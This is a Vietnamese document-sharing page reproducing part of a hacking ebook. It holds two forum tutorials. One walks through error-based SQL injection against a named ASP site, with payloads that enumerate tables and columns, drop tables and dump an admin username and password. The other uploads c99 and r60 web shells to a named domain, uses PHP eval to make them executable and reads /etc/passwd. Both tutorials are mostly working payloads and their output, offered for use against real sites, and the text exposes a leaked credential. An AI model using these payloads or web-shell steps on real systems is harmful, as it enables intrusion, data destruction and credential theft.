1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 316 potx

6 90 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 202 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

sao nó lại ra luôn user + pass của admin trong table webuser ???. drop table langtu đi : Code: '; drop table langtu-- nó trả về trang submit tới và ko báo lỗi có nghĩa là đã OK Bây giờ t

Trang 1

ặc ặc ặc ! ủa ủa ủa sao kì dậy sao nó lại ra luôn user + pass của admin trong table webuser ??? nhớ lần trước hack đâu có sãy ra chuyện này ??? Tới đây mình chưa xác định rõ table và column mà sao nó lại ra luôn user+pass luôn dậy ta Hôm nay viết tut thấy kì quặc thế nào Ko hiểu nỗi !

Đáng lẽ câu lệnh (select id from langtu) kia nó sẽ làm nhiệm vụ list tất cả các table trong data ra ! nhưng nó báo dậy thì pó chiếu hỏng biết giải thick sao

Tự nhiên đang viết tut có hứng tới đây nó ra mẹ user + pass khó hiểu quá !

Quyết tìm hiểu xem vì sao lại thế chứ

drop table langtu đi :

Code:

'; drop table langtu

nó trả về trang submit tới và ko báo lỗi có nghĩa là đã OK

Bây giờ thữ lại cái :

Trích:

'; begin declare @temp varchar(8000) set @temp='' select

@temp=@temp+table_name+'/' from information_schema.tables select @temp as

id into langtu end

Rồi select ra :

Trích:

' or 1=(select id from langtu)

ặc ặc ! Bây giờ thì mới đúng nè híc !

Trích:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDN T/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cdeCSTT_LS/cdeCSTT_tbao_TP

Trang 2

CP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS /DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoi bat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Ty giabinhquan/Tygi

/home/hethongTCTDHT.asp, line 172

Nghĩ đi nghĩ lại sao lạ quá ? Mới nãy cũng làm y hệt như trên sao nó loài ra luôn user + pass ? á á á có phải là mới nãy sau khi insert table langtu thì mình đã dùng : ' or 1=(system_user) để xem table nó đang sữ dụng là rồi rồi mới select id from langtu ra nó mới sãy ra hiện tượng loài luôn user + pass ra ko nhĩ ???? híc ! Hỏng hiểu được bỏ qua vậy

Tuy đã biết user + pass nhưng mình vẫn sẽ viết tiếp cho đúng cách làm việc của nó

!

Bây giờ bạn hãy thữ nhìn lên cái error list ra các table coi ??? nó hiện ra ko đầy đủ đúng ko ?? cái :" Tygiabinhquan/Tygi " có nghĩa là table nó dài quá ko list hết ra được !

hùhm, giờ sao cho nó list hết ra nhĩ ??? OK langtu dùng substring

Trích:

' or 1=(select top 1 substring(id,1,100) from langtu)

được :

Trích:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDN T/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cd' to a column of data type int /home/hethongTCTDHT.asp, line 172

nó sẽ list ra 100 kí tự đầu tiên từ 1 -> 100 :cool: Nhưng ta vấn chưa thấy table chứa user đâu cả tiếp tục :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

Trang 3

Trích:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

'eCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_di enbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi /Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaob' to a column of data type int

/home/hethongTCTDHT.asp, line 172

óe ! vấn chưa thấy tiếp tục :

Trích:

' or 1=(select top 1 substring(id,201,300) from langtu)

Được :

Trích:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

'properties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstrain ts/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Ty giacheo/TygiaVCB/Vanban/webgrand/webgroup/webuser/CacTCTD/cdeCNTH/cd eCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP /cdeCSTT_kqua_TTM/c' to a column of data type int

/home/hethongTCTDHT.asp, line 172

hè hè ! ta thấy table webuser rồi !

Bây giờ thì ta drop table langtu đi thôi : '; drop table langtu

OK thành công ! Để lấy tất cả column trong table webuser ta lại tiếp tục insert 1 column @temp vào table webuser giống hồi nãy dậy ta ! type :

Trích:

'; begin declare @temp varchar(8000) set @temp='' select

Trang 4

@temp=@temp+column_name+'/' from information_schema.columns where table_name='webuser' select @temp as id into langtu end

ko báo lỗi , tiếp tục : ' or 1=(select 1 from langtu)

được :

Trích:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value

'uid/username/password/description/gid/grand/QL/uid/username/password/descript ion/gid/grand/QL/' to a column of data type int

/home/hethongTCTDHT.asp, line 172

drop table langtu đi và tiếp tục :

Trích:

'; begin declare @temp varchar(8000) set @temp='' select

@temp=@temp+username+':'+password+'/' from webuser select @temp as id into langtu end

ko báo lỗi , giờ ta tiếp tục lấy user + pass : ' or 1=(select id from langtu)

được :

Trích:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int

/home/hethongTCTDHT.asp, line 172

Hề hề ! Vừa viết vừa làm mất hết 4 ngàn tiền net ! híc ! Nhưng cũng học được 1 kinh nghiệm xương máu là sau khi insert table vào ta xem run query xem user db sau đó dùng query list table ra tự nhiên nó hiện user + pass luôn hê hê !

Trang 5

Bye bye good luck to hack !

Author : langtuhaohoa ( HCEGroup.net )

Langtuhaohoa(HCE)

[tuts]- Local 4 newbie

Thấy anh em trong HCE lên mem hết rồi còn mỗi mình tủi thân nên vít cái tuts local cho newbie để lên mem :D [-O<

Mình sẽ check thằng thekyvn.com nhé

Đầu tiên kiếm được con shell trên server noá

Ok.Kiếm được 1 con c99 roài Safemode:Off mừng qúe :D

chơi luôn :

Trích:

cat /etc/passwd

bùm Ứ ra cái giè cả.Nhìn lại con shell mình chưa chmod có cái +x T_T

Tìm cái thư mục CHMOD ngu ngu roài up lên con r60 skin xanh lá của

@vns3curity (ghi điểm :D )

Vấn đề là vẫn ứ có cái +x để run command

Thôi thì đành dùng đến lão Eval PHP code của con r60

Trích:

chmod ("./r60_dep_wa.php",0755);

ấn nút excute

Nhìn lại con r60 của mình: -rwxr-xr-x hehe có cái +x vào roài

ok run command nèo :

Trích:

cat /etc/passwd

Bùm :

Trích:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:Daemon:/sbin:/bin/bash

lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash

mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false

games:x:12:100:Games account:/var/games:/bin/bash

wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false

ftp:x:40:49:FTP account:/srv/ftp:/bin/bash

Trang 6

nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash

messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash

uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN